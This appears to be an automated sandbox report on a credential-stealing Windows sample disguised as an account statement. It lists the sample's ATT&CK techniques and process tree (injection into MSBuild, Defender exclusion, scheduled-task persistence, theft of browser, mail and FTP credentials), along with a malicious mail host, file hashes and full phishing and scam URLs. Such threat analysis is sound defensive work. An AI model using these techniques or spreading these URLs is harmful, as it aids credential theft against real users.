Source: Yara match | File source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    311
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    12
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    Logon Script (Windows)1
                    Scheduled Task/Job
                    3
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    521
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model1
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets151
                    Virtualization/Sandbox Evasion
                    SSHKeylogging13
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Behavior Graph ID: 1428829
Sample: UPDATED SSTATEMENT OF ACCOUNT.exe
Start date: 19/04/2024
Architecture: WINDOWS
Score: 100

Network nodes: mail.tabcoeng.com; ip-api.com; 3 other IPs or domains
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 15 other signatures

Process tree (numbers in brackets are the graph's created-file / registry-value counts):
• UPDATED SSTATEMENT OF ACCOUNT.exe [7] started
  Dropped: C:\Users\user\AppData\...\TgfQNrhQjjseHY.exe (PE32); C:\Users\user\AppData\Local\...\tmpC678.tmp (XML)
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
  • MSBuild.exe [15, 2] started
    Network: mail.tabcoeng.com 135.181.124.14, 587 HETZNER-ASDE Germany; ip-api.com 208.95.112.1, 49711, 49714, 80 TUT-ASUS United States
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  • powershell.exe [23] started
    Signatures: Loading BitLocker PowerShell Module
    • conhost.exe started
    • WmiPrvSE.exe started
  • powershell.exe [23] started
    • conhost.exe started
  • schtasks.exe [1] started
    • conhost.exe started
• TgfQNrhQjjseHY.exe [5] started
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • MSBuild.exe started
    Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  • schtasks.exe started
    • conhost.exe started

Antivirus detection, submitted file (Source | Detection | Scanner):
UPDATED SSTATEMENT OF ACCOUNT.exe | 37% | ReversingLabs
UPDATED SSTATEMENT OF ACCOUNT.exe | 100% | Joe Sandbox ML
Antivirus detection, dropped file (Source | Detection | Scanner):
C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | 37% | ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Domains (Name | IP | Active | Malicious | Reputation):
bg.microsoft.map.fastly.net | 199.232.214.172 | Active: true | Malicious: false | Reputation: unknown
ip-api.com | 208.95.112.1 | Active: true | Malicious: false | Reputation: high
mail.tabcoeng.com | 135.181.124.14 | Active: true | Malicious: true | Reputation: unknown
fp2e7a.wpc.phicdn.net | 192.229.211.108 | Active: true | Malicious: false | Reputation: unknown
Contacted URLs (Name | Malicious | Reputation):
http://ip-api.com/line/?fields=hosting | Malicious: false | Reputation: high
URLs from memory and binaries (Name | Source | Malicious | Reputation):
http://tempuri.org/x.xsd?MultiGames.Properties.Resources | Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr | Malicious: false | Reputation: unknown
http://mail.tabcoeng.com | Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: unknown
https://account.dyn.com/ | Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2178810898.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/zuppao). | Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr | Malicious: false | Reputation: high
http://ip-api.com | Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | Malicious: false
135.181.124.14 | mail.tabcoeng.com | Germany | 24940 | HETZNER-ASDE | Malicious: true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428829
Start date and time: 2024-04-19 17:13:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: UPDATED SSTATEMENT OF ACCOUNT.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@19/15@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 110
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 52.159.127.243, 52.165.165.26, 192.229.211.108, 20.3.187.198, 199.232.214.172, 52.165.164.15
• Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: UPDATED SSTATEMENT OF ACCOUNT.exe
Time | Type | Description
17:14:01 | API Interceptor | 1x Sleep call for process: UPDATED SSTATEMENT OF ACCOUNT.exe modified
17:14:03 | API Interceptor | 27x Sleep call for process: powershell.exe modified
17:14:04 | Task Scheduler | Run new task: TgfQNrhQjjseHY path: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
17:14:04 | API Interceptor | 197x Sleep call for process: MSBuild.exe modified
17:14:05 | API Interceptor | 1x Sleep call for process: TgfQNrhQjjseHY.exe modified
IP context (Match; then per associated sample: Sample Name / URL | Detection | Threat Name | Context):
208.95.112.1
• Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | ip-api.com/line/?fields=hosting
• REMITTANCE COPY.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
• New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | ip-api.com/json/?fields=status,country,regionName,city,query
• DHL.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
• KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | ip-api.com/line/?fields=hosting
• eO2bqORIJb.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
• SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | ip-api.com/json
• 13w4NM6mPa.exe | malicious | LummaC | ip-api.com/json
• mdWXrbOxsY.exe | malicious | Xehook Stealer | ip-api.com/line/?fields=hosting
• mdWXrbOxsY.exe | malicious | Xehook Stealer | ip-api.com/line/?fields=hosting
135.181.124.14
• REMITTANCE COPY.exe | malicious | AgentTesla
Domain context (Match; then per associated sample: Sample Name / URL | Detection | Threat Name | Context):
fp2e7a.wpc.phicdn.net
• REMITTANCE COPY.exe | malicious | AgentTesla | 192.229.211.108
• eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 192.229.211.108
• purchaseorder4.exe | malicious | Python Stealer | 192.229.211.108
• https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884 | malicious | HTMLPhisher | 192.229.211.108
• https://diversityjobs.com/employer/company/1665/Worthington-Industries-Inc | malicious | Unknown | 192.229.211.108
• https://app.box.com/s/ktl5qtvf2us1megbgmjabwqaxcdy69b5 | malicious | Unknown | 192.229.211.108
• https://dt.r24dmp.de/ | malicious | Unknown | 192.229.211.108
• s.exe | malicious | Unknown | 192.229.211.108
• https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_body | malicious | GRQ Scam | 192.229.211.108
• http://bestprizerhere.life/ | malicious | Unknown | 192.229.211.108
ip-api.com
• Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
• REMITTANCE COPY.exe | malicious | AgentTesla | 208.95.112.1
• New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | 208.95.112.1
• DHL.exe | malicious | AgentTesla | 208.95.112.1
• KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 208.95.112.1
• eO2bqORIJb.exe | malicious | AgentTesla | 208.95.112.1
• SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | 208.95.112.1
• 13w4NM6mPa.exe | malicious | LummaC | 208.95.112.1
• mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1
• mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1
mail.tabcoeng.com
• REMITTANCE COPY.exe | malicious | AgentTesla | 135.181.124.14
bg.microsoft.map.fastly.net
• Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 199.232.210.172
• https://royaltattoo.in/js/kalexander@yourlawyer.com | malicious | Phisher | 199.232.214.172
• REMITTANCE COPY.exe | malicious | AgentTesla | 199.232.214.172
• purchaseorder4.exe | malicious | Python Stealer | 199.232.210.172
• https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884 | malicious | HTMLPhisher | 199.232.210.172
• https://diversityjobs.com/employer/company/1665/Worthington-Industries-Inc | malicious | Unknown | 199.232.210.172
• s.exe | malicious | Unknown | 199.232.214.172
• https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_body | malicious | GRQ Scam | 199.232.214.172
• https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3d | malicious | HTMLPhisher | 199.232.210.172
• ServerInfo.exe | malicious | Unknown | 199.232.210.172
                                            Match
                                            • Associated Sample Name / URL | Detection | Threat Name | Context
                                            HETZNER-AS (DE)
                                            • REMITTANCE COPY.exe | malicious | AgentTesla | 135.181.124.14
                                            • https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_body | malicious | GRQ Scam | 136.243.216.235
                                            • New Soft Update.exe | malicious | Unknown | 116.203.164.39
                                            • Oo2yeTdq5J.elf | malicious | Mirai | 88.198.32.246
                                            • H8wnVxIEh6.elf | malicious | Gafgyt, Mirai | 197.242.86.246
                                            • QXeoSsX87R.elf | malicious | Gafgyt, Mirai | 144.79.65.41
                                            • 3OcPSlVa7n.elf | malicious | Mirai | 168.119.31.114
                                            • http://www.indeks.pt/ | malicious | Unknown | 176.9.67.69
                                            • PBZcC2ge1z.exe | malicious | PureLog Stealer, RHADAMANTHYS | 95.216.228.180
                                            • https://00f82de.blob.core.windows.net/00f82de/1.html?4SdhQu6964HfYs43wfnwuulljn913CWVGBFRQHRPAHNP32199OVKO12176b14#14/43-6964/913-32199-12176 | malicious | Phisher | 178.63.248.54
                                            TUT-AS (US)
                                            • Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 208.95.112.1
                                            • REMITTANCE COPY.exe | malicious | AgentTesla | 208.95.112.1
                                            • New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | 208.95.112.1
                                            • DHL.exe | malicious | AgentTesla | 208.95.112.1
                                            • KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 208.95.112.1
                                            • eO2bqORIJb.exe | malicious | AgentTesla | 208.95.112.1
                                            • SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe | malicious | Unknown | 208.95.112.1
                                            • 13w4NM6mPa.exe | malicious | LummaC | 208.95.112.1
                                            • mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1
                                            • mdWXrbOxsY.exe | malicious | Xehook Stealer | 208.95.112.1
                                            Match
                                            • Associated Sample Name / URL | Detection | Threat Name | Context
                                            1138de370e523e824bbca92d049a3777
                                            • REMITTANCE COPY.exe | malicious | AgentTesla | 173.222.162.64
                                            • https://www.dropbox.com/l/scl/AADwcgxTbjuvzakz6kszZMzP6RXavhxhixQ | malicious | HTMLPhisher | 173.222.162.64
                                            • eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 173.222.162.64
                                            • https://cionfacttalleriproj.norwayeast.cloudapp.azure.com/?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884 | malicious | HTMLPhisher | 173.222.162.64
                                            • https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_body | malicious | GRQ Scam | 173.222.162.64
                                            • New Voicemail_Daiichi-Sankyo.html | malicious | HTMLPhisher | 173.222.162.64
                                            • VnSRmWE631.html | malicious | Unknown | 173.222.162.64
                                            • xYUpeXwPkWEHXm4.exe | malicious | AgentTesla | 173.222.162.64
                                            • nBBR7c5gR5.html | malicious | Unknown | 173.222.162.64
                                            • dwutTyDPzl2TBZV.exe | malicious | AgentTesla | 173.222.162.64
                                            No context
                                            Process:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):2232
                                            Entropy (8bit):5.380805901110357
                                            Encrypted:false
                                            SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                            MD5:B11E25ABF5BF7766D7D7437596AFFED0
                                            SHA1:D673CFF28D1C21A672BFE165614629B2BB23DE93
                                            SHA-256:EE402CA8A7E7FA1F95CD644AFE756C8AF734E810797FD3E9C6762FCC2510F3F6
                                            SHA-512:D4C19BF1948BCF50899840F4B670ECF7510D65597054A89963D3155DB3869E65F2ABA2F6CE9C9E5F18890A65719E514E1D1EC6394EF99DF21E60F8220FA157C4
                                            Malicious:false
                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            The same 60-byte PowerShell AppLocker test file (MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7) is dropped by powershell.exe seven further times; those entries repeat the fields above verbatim.
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1601
                                            Entropy (8bit):5.108633823969318
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLGxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT2v
                                            MD5:311309CCB2289C24505110FE1A5449D0
                                            SHA1:01B0D0054BCDD85CC64FD8D1CE48AA2637062B8B
                                            SHA-256:E505613BD46CF611D0F5F79FCC1BC020F85309C7DD1FF281317402973E7B2186
                                            SHA-512:46AC33A1C232AAA711D21C8D28829EB22845CA8DFFD76907510122210EBAA6CD10F3CC072272EE85F6A8252CC990DDF18CBE84236470267AF5CA78D15DAC7077
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                            Process:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1601
                                            Entropy (8bit):5.108633823969318
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLGxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT2v
                                            MD5:311309CCB2289C24505110FE1A5449D0
                                            SHA1:01B0D0054BCDD85CC64FD8D1CE48AA2637062B8B
                                            SHA-256:E505613BD46CF611D0F5F79FCC1BC020F85309C7DD1FF281317402973E7B2186
                                            SHA-512:46AC33A1C232AAA711D21C8D28829EB22845CA8DFFD76907510122210EBAA6CD10F3CC072272EE85F6A8252CC990DDF18CBE84236470267AF5CA78D15DAC7077
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
